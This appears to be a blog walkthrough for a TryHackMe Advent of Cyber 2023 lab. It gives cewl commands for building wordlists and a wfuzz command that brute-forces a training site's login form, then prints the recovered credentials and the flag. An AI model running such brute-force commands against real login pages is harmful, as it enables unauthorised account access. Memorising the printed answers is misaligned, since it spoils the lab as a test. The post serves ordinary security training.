Open in app

Sign in

Write

Sign in

Advent of Cyber 2023 — Day 4

Mansoor Barri
Dec 5, 2023

--

What is the correct username and password combination? Format username:password

  • Generate a list of usernames using Cewl by executing the command: cewl -d 0 -m 5 -w usernames.txt http://MACHINE-IP/team.php — lowercase
  • create a list of passwords using Cewl with the command: cewl -d 2 -m 5 -w passwords.txt http://MACHINE-IP — with-numbers
  • Finally, perform a brute force attack on the credentials using wfuzz with the following command: wfuzz -c -z file,usernames.txt -z file,passwords.txt — hs “Please enter the correct credentials” -u http://MACHINE-IP/login.php -d “username=FUZZ&password=FUZ2Z”
isaias:Happiness

What is the flag?

Log in and click on the Email with the Subject “Confidential Message”

THM{m3rrY4nt4rct1crAft$}

That’s it | Visit mansoorbarri.com for other hacking & IT related articles.

Tryhackme
Advent Of Cyber 2023
Mansoorbarri

--

--

Mansoor Barri
Mansoor Barri

Written by Mansoor Barri

6 Followers
1 Following

Profile designed to share technology content about Penetration testing, Linux and Windows.

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams